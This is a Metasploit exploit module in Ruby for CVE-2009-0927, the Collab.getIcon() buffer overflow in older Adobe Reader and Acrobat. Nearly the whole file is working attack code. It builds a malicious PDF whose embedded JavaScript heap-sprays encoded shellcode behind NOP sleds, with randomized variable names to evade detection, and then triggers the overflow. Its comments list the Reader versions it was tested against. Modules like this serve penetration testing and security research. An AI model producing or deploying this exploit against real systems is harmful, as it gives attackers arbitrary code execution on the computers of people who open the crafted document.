Adobe Collab.getIcon() Buffer Overflow

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zlib'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::PDF

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Adobe Collab.getIcon() Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.
        Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially
        crafted pdf that a contains malformed Collab.getIcon() call, an attacker may
        be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'MC',
          'Didier Stevens <didier.stevens[at]gmail.com>',
          'jduck'
        ],
      'References'     =>
        [
          [ 'CVE', '2009-0927' ],
          [ 'OSVDB', '53647' ],
          [ 'ZDI', '09-014' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'         => 1024,
          'BadChars'      => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # test results (on Windows XP SP3)
          # reader 7.0.5 - no trigger
          # reader 7.0.8 - no trigger
          # reader 7.0.9 - no trigger
          # reader 7.1.0 - no trigger
          # reader 7.1.1 - reported not vulnerable
          # reader 8.0.0 - works
          # reader 8.1.2 - works
          # reader 8.1.3 - reported not vulnerable
          # reader 9.0.0 - works
          # reader 9.1.0 - reported not vulnerable
          [ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],
        ],
      'DisclosureDate' => '2009-03-24',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
      ])
  end

  def exploit
    # Encode the shellcode.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Make some nops
    nops    = Rex::Text.to_unescape(make_nops(4))

    # Randomize variables
    rand1  = rand_text_alpha(rand(100) + 1)
    rand2  = rand_text_alpha(rand(100) + 1)
    rand3  = rand_text_alpha(rand(100) + 1)
    rand4  = rand_text_alpha(rand(100) + 1)
    rand5  = rand_text_alpha(rand(100) + 1)
    rand6  = rand_text_alpha(rand(100) + 1)
    rand7  = rand_text_alpha(rand(100) + 1)
    rand8  = rand_text_alpha(rand(100) + 1)
    rand9  = rand_text_alpha(rand(100) + 1)
    rand10 = rand_text_alpha(rand(100) + 1)
    rand11 = rand_text_alpha(rand(100) + 1)
    rand12 = rand_text_alpha(rand(100) + 1)

    script = %Q|
    var #{rand1} = unescape("#{shellcode}");
    var #{rand2} ="";
    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
    #{rand4} = #{rand2} + #{rand1};
    #{rand5} = unescape("#{nops}");
    #{rand6} = 20;
    #{rand7} = #{rand6}+#{rand4}.length
    while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
    #{rand8} = #{rand5}.substring(0, #{rand7});
    #{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
    while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
    #{rand10} = new Array();
    for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
    var #{rand12} = unescape("%0a");
    while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};
    #{rand12} = "N."+#{rand12};
    Collab.getIcon(#{rand12});
          |

    # Create the pdf
    #pdf = make_pdf(script)
    pdf = create_pdf(script)
    print_status("Creating '#{datastore['FILENAME']}' file...")

    file_create(pdf)
  end
end